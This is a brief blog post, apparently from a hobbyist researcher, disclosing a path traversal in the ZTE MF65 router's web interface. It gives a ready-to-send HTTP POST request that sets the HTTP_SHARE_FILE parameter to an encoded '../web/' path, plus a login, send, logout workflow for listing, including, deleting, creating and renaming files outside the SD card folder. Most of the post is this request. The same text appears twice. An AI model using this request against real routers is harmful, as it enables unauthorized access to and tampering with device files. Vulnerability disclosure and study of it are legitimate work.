/////ZTE MF65 -- local file listing method 2(LFLM )/////
another super quick one for a better listing in the web application
POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.168.0.1
isTest=false&goformId=HTTPSHARE_AUTH_SET
&HTTP_SHARE_STATUS=Enabled
&HTTP_SHARE_WR_AUTH=readWrite
&HTTP_SHARE_FILE=..%2Fweb%2F
using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager,
you will need to be logged in for this method.
so your work flow is:
this can be used to include files, delete, create and rename files/folders.
this is method requires login but other methods can work without a login.
till next time :)
FrankSxx
POST /goform/goform_set_cmd_process HTTP/1.1
Host: 192.168.0.1
isTest=false&goformId=HTTPSHARE_AUTH_SET
&HTTP_SHARE_STATUS=Enabled
&HTTP_SHARE_WR_AUTH=readWrite
&HTTP_SHARE_FILE=..%2Fweb%2F
using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager,
you will need to be logged in for this method.
so your work flow is:
- login
- send request to change path
- logout
this can be used to include files, delete, create and rename files/folders.
this is method requires login but other methods can work without a login.
till next time :)
FrankSxx
Comments
Post a Comment